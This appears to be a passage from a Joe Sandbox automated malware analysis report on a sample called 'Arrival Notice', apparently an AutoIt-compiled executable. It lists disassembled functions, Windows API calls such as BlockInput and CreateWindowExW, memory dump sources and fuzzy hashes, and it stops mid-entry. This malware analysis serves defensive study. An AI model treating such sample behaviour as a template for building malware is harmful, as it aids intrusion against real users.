                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003E6766,?,?,00000008,?,?,003EFEFE,00000000), ref: 003E6998
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: b1127e569afc0849a2e4837903d9a0051b0105170007842d5b475ceeb9130937
                  • Instruction ID: 636d81e8621c27ab3de95dbddf34988d159443d3d21284b06300da2de49054a3
                  • Opcode Fuzzy Hash: b1127e569afc0849a2e4837903d9a0051b0105170007842d5b475ceeb9130937
                  • Instruction Fuzzy Hash: 48B16B716106588FD716CF29C48AB657BE0FF153A4F268658E899CF2E2C335E981CB40
                  Function 003CB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: ec7e4203bff3b924680c1a5584585998f1748b9f72800baf978d19c937711491
                  • Instruction ID: f0386902d561634dbe8ef51fbcc2d278ec9b50e44eaa5f258eb712ff54c52d27
                  • Opcode Fuzzy Hash: ec7e4203bff3b924680c1a5584585998f1748b9f72800baf978d19c937711491
                  • Instruction Fuzzy Hash: F81282719002299BCB15CF59C981BEEB7B5FF48310F1481AEE849EB291EB349E41CF94
                  Function 0042EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • BlockInput.USER32(00000001), ref: 0042EABD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BlockInput
                  • String ID:
                  • API String ID: 3456056419-0
                  • Opcode ID: 212f8158b108b3f9dc2968ef41b7e2ad052029a90ffedcddeefc4d284f05a4e8
                  • Instruction ID: 135e910c38c499c12b4a645ca221d2f805d36a6bda12c9a5dde523ff19e7f625
                  • Opcode Fuzzy Hash: 212f8158b108b3f9dc2968ef41b7e2ad052029a90ffedcddeefc4d284f05a4e8
                  • Instruction Fuzzy Hash: 74E09A312002109FC310EF5AE804E9AF7E8AFA9760F00802AFD0ACB350CAB0A8408B91
                  Function 003D09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003D03EE), ref: 003D09DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 80ae16b843fa46f51126a3aacbe03e659fefe95c4cd3eec30804807695cf4842
                  • Instruction ID: f4079885e2b4ce754b4d2b261ca7a4f72429d99805c9e940b1ccc8606c123b64
                  • Opcode Fuzzy Hash: 80ae16b843fa46f51126a3aacbe03e659fefe95c4cd3eec30804807695cf4842
                  • Instruction Fuzzy Hash:
                  Function 003D781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction ID: 4e9d06db489262a134a84ae43df13bd005e9e72ae06d983fc91df6ef59cad98a
                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                  • Instruction Fuzzy Hash: 3051577360C6455ADB3B4638B86B7FE63999B02340F19050BD886CB782F725EE05E356
                  Function 00422046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0&H
                  • API String ID: 0-1626568196
                  • Opcode ID: 481238bbefd848d2e84b6650c451c8d68325d0ca98fb6f90cc1b4c241496f55a
                  • Instruction ID: 93556e3151eefdbb823c8a77451140b5daafd743d39d1ac154db4ee5c012459d
                  • Opcode Fuzzy Hash: 481238bbefd848d2e84b6650c451c8d68325d0ca98fb6f90cc1b4c241496f55a
                  • Instruction Fuzzy Hash: D721E7327206118BD728CF79C92367E73E5A754310F548A2EE5A7D73D0DE79A904CB84
                  Function 003E6DD9 Relevance: .6, Instructions: 637COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e07187057c0b84e14b680782ce5449b8761122ff6276ac00b1b98faa21e46151
                  • Instruction ID: 577e7f0b8963e70b304851a18a90c3988b1a234b410879652297168ad9aabaf8
                  • Opcode Fuzzy Hash: e07187057c0b84e14b680782ce5449b8761122ff6276ac00b1b98faa21e46151
                  • Instruction Fuzzy Hash: FD324522D29F914DD7239635DD22336A259AFB73C6F25C737E81AB59E6EB28C4834100
                  Function 003CCC39 Relevance: .6, Instructions: 635COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 50bca7ff66a0ab75c50a2173fe688202a2f521be67ad350d60105c603a78a051
                  • Instruction ID: 63ba4236efa7602bd04d71f91cc9a2516df36deb0d899fa5eb1b7f9388db3144
                  • Opcode Fuzzy Hash: 50bca7ff66a0ab75c50a2173fe688202a2f521be67ad350d60105c603a78a051
                  • Instruction Fuzzy Hash: C232CF32A14115CBDF29CB28C4D4B7E77A1EB45300F29867BD85AEB3D1D2389D82DB49
                  Function 003B7920 Relevance: .6, Instructions: 563COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69aa0af51c8c20b1b65f5947d71b1fe5956815960c523acc2c36e136eaadc988
                  • Instruction ID: b572910d42651808407805c8b92a36bb7f28e263f5375a1de3ead2dbe366fb3a
                  • Opcode Fuzzy Hash: 69aa0af51c8c20b1b65f5947d71b1fe5956815960c523acc2c36e136eaadc988
                  • Instruction Fuzzy Hash: E622BF70A046099FDF15CF68C881AEEB7F6FF44304F204529EA16EB691EB359D51CB50
                  Function 003B91C0 Relevance: .5, Instructions: 475COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2826f8541ca1ecf1f89a36a1b3de594023758aa7558adf6c699a53bd0facf5a6
                  • Instruction ID: 7103070e430adc6c23cab06b8c7d29bdaf2a485614dd59b52bad80ec093b0625
                  • Opcode Fuzzy Hash: 2826f8541ca1ecf1f89a36a1b3de594023758aa7558adf6c699a53bd0facf5a6
                  • Instruction Fuzzy Hash: F302C4B1E00209EFCB06DF64D881BADB7B5FF44304F118169EA06DB6A1E731AE50CB95
                  Function 003D1C77 Relevance: .3, Instructions: 254COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction ID: 4e9de5705fef9d3000b80ca79ee6b5692efd69806ca102378f6ed66267b87a06
                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                  • Instruction Fuzzy Hash: 769177736090A35BDB6B463AA57403EFFE55A923A131B079FD4F2CB2C5EF208954D620
                  Function 003D19B0 Relevance: .2, Instructions: 240COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction ID: f1a88fe30fb4366e332fc2e20ec562b83f5083b92226679e94e58c4e500b9538
                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                  • Instruction Fuzzy Hash: 299154732090A35BDB2F427AA57403DFFE55A923A131B079FD4F2CA6C5FE24C5649620
                  Function 003D7A4A Relevance: .2, Instructions: 237COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3c057e4f6e927fb340a80c722c7cdcade73bdbda0f6058c2e9df3009df6d6a5
                  • Instruction ID: 749981ef446c2c7107f74eab73030c075decc8e7ad59b59dd8d2a895e30a8e01
                  • Opcode Fuzzy Hash: d3c057e4f6e927fb340a80c722c7cdcade73bdbda0f6058c2e9df3009df6d6a5
                  • Instruction Fuzzy Hash: 1461587320C74956DA3B9A28BCA6BBE2398EF41700F12091BF843DF781F611EE468355
                  Function 003D7CA7 Relevance: .2, Instructions: 237COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 608c17bceaf1cb60a8c1023edfba1d8d0a67e3c0f75baf6f0355445861a0c060
                  • Instruction ID: cd7514fdc2056845ba932351314ad69aa5772c06fe48bf436a2b32bed0670508
                  • Opcode Fuzzy Hash: 608c17bceaf1cb60a8c1023edfba1d8d0a67e3c0f75baf6f0355445861a0c060
                  • Instruction Fuzzy Hash: 1A61AC3360870957DE3B5A28B892BBF639ADF42704F11095BE943CF781FA12ED428355
                  Function 003D1706 Relevance: .2, Instructions: 232COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction ID: a556fd76a8deb6a78f7b52a77d0f5216e82f952b7dc13ab8dfe6f760b5cad29c
                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                  • Instruction Fuzzy Hash: 458177736080A31BDB6F8279953403EFFE15A923A131B079FD4F2CA6D5EE248554E660
                  Function 00432ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00432B30
                  • DeleteObject.GDI32(00000000), ref: 00432B43
                  • DestroyWindow.USER32 ref: 00432B52
                  • GetDesktopWindow.USER32 ref: 00432B6D
                  • GetWindowRect.USER32(00000000), ref: 00432B74
                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00432CA3
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00432CB1
                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432CF8
                  • GetClientRect.USER32(00000000,?), ref: 00432D04
                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00432D40
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D62
                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D75
                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D80
                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D89
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432D98
                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432DA1
                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432DA8
                  • GlobalFree.KERNEL32(00000000), ref: 00432DB3
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432DC5
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0044FC38,00000000), ref: 00432DDB
                  • GlobalFree.KERNEL32(00000000), ref: 00432DEB
                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00432E11
                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00432E30
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00432E52
                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0043303F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                  • String ID: $AutoIt v3$DISPLAY$static
                  • API String ID: 2211948467-2373415609
                  • Opcode ID: 5bbc20e0ce28699c2a7331374591631541a6328257729e17b81d607ba542554d
                  • Instruction ID: 235bcbd8364cc1206ca40eae6504a7e42609eaf13a68cb059d1aecad754b862b
                  • Opcode Fuzzy Hash: 5bbc20e0ce28699c2a7331374591631541a6328257729e17b81d607ba542554d
                  • Instruction Fuzzy Hash: B4029E75A00204AFDB14DF64CD89EAE7BB9FF49310F148529F915AB2A1CB74AD01CF64
                  Function 004470D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                  Download Yara Rule
                  APIs
                  • SetTextColor.GDI32(?,00000000), ref: 0044712F
                  • GetSysColorBrush.USER32(0000000F), ref: 00447160
                  • GetSysColor.USER32(0000000F), ref: 0044716C
                  • SetBkColor.GDI32(?,000000FF), ref: 00447186
                  • SelectObject.GDI32(?,?), ref: 00447195
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004471C0
                  • GetSysColor.USER32(00000010), ref: 004471C8
                  • CreateSolidBrush.GDI32(00000000), ref: 004471CF
                  • FrameRect.USER32(?,?,00000000), ref: 004471DE
                  • DeleteObject.GDI32(00000000), ref: 004471E5
                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00447230
                  • FillRect.USER32(?,?,?), ref: 00447262
                  • GetWindowLongW.USER32(?,000000F0), ref: 00447284
                    • Part of subcall function 004473E8: GetSysColor.USER32(00000012), ref: 00447421
                    • Part of subcall function 004473E8: SetTextColor.GDI32(?,?), ref: 00447425
                    • Part of subcall function 004473E8: GetSysColorBrush.USER32(0000000F), ref: 0044743B
                    • Part of subcall function 004473E8: GetSysColor.USER32(0000000F), ref: 00447446
                    • Part of subcall function 004473E8: GetSysColor.USER32(00000011), ref: 00447463
                    • Part of subcall function 004473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00447471
                    • Part of subcall function 004473E8: SelectObject.GDI32(?,00000000), ref: 00447482
                    • Part of subcall function 004473E8: SetBkColor.GDI32(?,00000000), ref: 0044748B
                    • Part of subcall function 004473E8: SelectObject.GDI32(?,?), ref: 00447498
                    • Part of subcall function 004473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004474B7
                    • Part of subcall function 004473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004474CE
                    • Part of subcall function 004473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004474DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                  • String ID:
                  • API String ID: 4124339563-0
                  • Opcode ID: f470876ac78b269bd13a7d40cc7061f6a2623c372def8a086d91bd8633f05a21
                  • Instruction ID: 197a62a55588d8607be3009edb25428b95ff08f93ae5e1914e13e5b63b4958ef
                  • Opcode Fuzzy Hash: f470876ac78b269bd13a7d40cc7061f6a2623c372def8a086d91bd8633f05a21
                  • Instruction Fuzzy Hash: 78A1C176009311BFE7509F60DC88E5BBBA9FB4A321F140A29F962961E1D774E801CF56
                  Function 003C8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 003C8E14
                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00406AC5
                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00406AFE
                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00406F43
                    • Part of subcall function 003C8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003C8BE8,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 003C8FC5
                  • SendMessageW.USER32(?,00001053), ref: 00406F7F
                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00406F96
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00406FAC
                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00406FB7
                  Strings
                  Memory Dump Source
